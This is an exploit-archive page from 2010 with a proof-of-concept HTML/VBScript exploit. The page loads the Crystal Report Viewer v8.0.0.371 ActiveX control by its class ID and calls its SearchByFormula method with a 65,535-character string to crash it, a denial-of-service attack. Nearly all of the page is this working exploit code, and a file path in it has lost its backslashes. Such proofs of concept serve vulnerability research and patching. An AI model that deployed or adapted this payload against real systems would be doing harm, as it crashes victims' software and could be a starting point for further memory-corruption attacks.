Crystal Report Viewer v8.0.0.371 ActiveX Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Crystal Report Viewer v8.0.0.371 ActiveX Denial of Service Vulnerability
# Published : 2010-11-03
# Author : Matthew Bergin
# Previous Title : HtaEdit v 3.2.3.0 (.hta) Buffer Overflow Vulnerability
# Next Title : Avira Premium Security Suite NtCreateKey Race Condition Vulnerability

<html>
Crystal Reporting Viewer v8.0.0.371
Author: Matthew Bergin
Website: www.berginpentesting.com
Website: www.smashthestack.org
<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' ></object>
<script language='vbscript'>

targetFile = "C:WINDOWSsystem32crviewer.dll"
prototype  = "Sub SearchByFormula ( ByVal formula As String )"
memberName = "SearchByFormula"
progid     = "CRVIEWERLib.CRViewer"
argCount   = 1

arg1=String(65535, "A")

target.SearchByFormula arg1 

</script>